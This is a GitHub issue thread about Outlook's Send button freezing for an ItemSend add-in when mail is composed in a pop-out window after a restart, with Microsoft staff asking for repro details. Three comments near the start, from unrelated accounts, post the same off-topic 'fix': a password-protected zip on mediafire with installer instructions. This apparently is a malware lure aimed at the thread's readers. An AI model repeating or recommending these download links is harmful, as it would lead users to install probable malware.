### ISSUE TITLE
"Send" button in outlook freezes when restarting outlook and sending mail for first time in new (pop out) window for ItemSend add-in

### ISSUE THREAD

**Issue by pza-dev-brcm** [OfficeDev/office-js#4840]
We are using ItemSend event in outlook add-in. We monitor email content like subject, body, recipients, attachments and based on policy we decide whether to allow or block the email to be sent.
For optimisation, we are handling OnMessageAttachmentsChanged event too in add-in.
As a result, when user attaches any file to email we get callback and we do some processing as per business logic.

We don't see any issue when add-in loads properly at the time of sending an email.
ItemSend event gets triggered and add-in works properly.

But we have observed issue inconsistently with below steps
 1. User relaunches outlook application.
 2. For composing email user opens "new (pop out) window". [Issue is seen when mail is composes in pop up window]
 3. Composes email and click on "send" button. then "send" button freezes and mail is not sent.
 
Note: 
We don't see add-in working on your request message, in this case.
It seems that add-in is not yet triggered as send action of mail is not completed properly.

Also note that, this issue is inconsistent and only observed when we relaunch outlook application, and first mail we are composing 
 in "new (Pop out) window"

Your Environment
Platform [PC desktop, Mac, iOS, Office on the web]: PC Desktop
Host [Excel, Word, PowerPoint, etc.]: New Outlook
Office version number: Microsoft Outlook Version 1.2024.814.200 (Production) | Client Version is 20240809006.12 | WebView2 Version is 127.0.2651.105
Operating System: Windows11
Browser (if using Office on the web): Chrome

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajjha-msft** [comment]
Hey @pza-dev-brcm 

It is not a repro for us. 
- Can you please share a repro video?
- Can you please share a test add-in which we can use to repro ?

**Comment by Medha-lab** [comment]
Please find attach video for this issue 
https://github.com/user-attachments/assets/06e2e23d-753a-43bc-a822-2f651a0d7315

**Comment by mobisw-msft** [comment]
Hey @Medha-lab ,

I had a few follow up questions before we proceed.

1. It looks like the popout page is still loading. If you wait long enough for the Popout page to fully load, and then send the email, does this issue still persist?
2. What is the experience when no ItemSend add-ins are installed? Does the sending of the email still fail?
3. Does this issue exist for you in Outlook for Web for the same behaviour?

**Comment by Medha-lab** [comment]
Please find answers below for above queries -
1.This issue still persist if we wait long enough after pop out and then send mail.
2.Not seeing this issue when no ItemSend add-ins are installed 
3.This is also exist for Outlook for web

**Comment by exextoc** [comment]
@Medha-lab Please share the addin that we can side load and test the scenario. Share the minimal addin that helps us repro the scenario. You can create a private repo and share it with @exextoc.

**Comment by Medha-lab** [comment]
We will provide

**Comment by Medha-lab** [comment]
@pza-dev-brcm Please attach the sample addin

**Comment by pza-dev-brcm** [comment]
[CheckBody.zip](https://github.com/user-attachments/files/17014847/CheckBody.zip)

Please find sample attached add-in. Please replace correct path in xml file where you want to host the add-in.

**Comment by Swathy-Mothilal** [comment]
@pza-dev-brcm Thanks for the information. We're still unable to reproduce the issue on our side. However, after reviewing the repro video, could you please confirm if the issue might be related to network connectivity? It appears that none of the icons in the popup window are loading.

**Comment by pza-dev-brcm** [comment]
@Swathy-Mothilal No, we can't say that this issue is related to network connectivity, we are able to send emails from other popped out window at the same time. Might be some outlook initialisation issue as icons are not appearing sometimes.

**Comment by Medha-lab** [comment]
In past as well for icon we logged MS ticket https://github.com/OfficeDev/office-js/issues/4088. Even if icons are not loaded able to send mail.

**Comment by sivachandran-msft** [comment]
@Medha-lab  @pza-dev-brcm  When was this last tested? Are you able to repro this scenario this week? If the issue is still repro-able, please follow the steps in this [link](https://github.com/OfficeDev/office-js/wiki/Collecting-log-files-for-Outlook-Add%E2%80%90ins-issues) and share the mentioned logs. This will help with our analysis.

**Comment by neprasad-microsoft** [comment]
@Medha-lab , @pza-dev-brcm 
1. Is this issue still reproducible?
2. If yes, can you reproduce on all accounts or only some accounts?
3. Can you reproduce this on OWA also or only New Outlook?
4. Can you share a test account where this reproduces?
